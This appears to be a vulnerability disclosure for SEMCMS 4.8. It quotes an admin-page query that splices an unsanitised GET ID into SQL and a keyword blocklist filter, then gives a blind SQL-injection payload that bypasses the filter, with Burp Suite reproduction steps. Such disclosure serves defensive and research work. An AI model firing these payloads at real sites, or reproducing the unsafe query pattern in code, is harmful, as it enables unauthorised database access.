Introduction to Semcms

SEMCMS is a foreign trade website content management system (CMS) that supports multiple languages.

v4.8 Download Link: http://www.sem-cms.com/TradeCmsdown/php/semcms_php_4.8.zip

Causes of vulnerabilities:

/xcR45q_Admin/SEMCMS_Menu.php Line 66

Vulnerability code:

<?php
 } elseif ($type == "edit") {
 
   $row = mysqli_fetch_array($db_conn->query("SELECT * FROM sc_menu WHERE ID=" . $_GET["ID"]));
 
   ?>

It can be seen that the ID here will execute an SQL statement when passing parameters through GET

Filter code at/Include/contorl. PHP

Line 151

function test_input($data) { 
    //$data = str_replace("%", "percent", $data);
    $data = trim($data);
    $data = stripslashes($data);
    $data = htmlspecialchars($data,*ENT_QUOTES*);
    return $data;
  }

And the 8th line

function inject_check_sql($sql_str) {
 
   return preg_match('/select|and|insert|=|%|<|between|update|\'|\*|union|into|load_file|outfile/i',$sql_str); 
 } 
 function verify_str($str) { 
    if(inject_check_sql($str)) {
      exit('Sorry,You do this is wrong! (.-.)');
     } 
   return $str;
 } 

By filtering the above content, we can construct a payload

-1%20or%20length(database())%20REGEXP%20char(94,53,36)

Recurrence of vulnerabilities

visit a website

http://url/xcR45q_Admin/SEMCMS_Menu.php

Brupsuite packet capture, Due to the length of the database name being 5 when creating a new site, the payload is constructed as

-1%20or%20length(database())%20REGEXP%20char(94,53,36)

（Determine if the length of the database name is 5）

Insert payload to view echo

Change the payload at this time

-1%20or%20length(database())%20REGEXP%20char(94,54,36)

（Determine if the length of the database name is 6）

Change the payload at this time

SQL injection can continue based on changes in the page in the future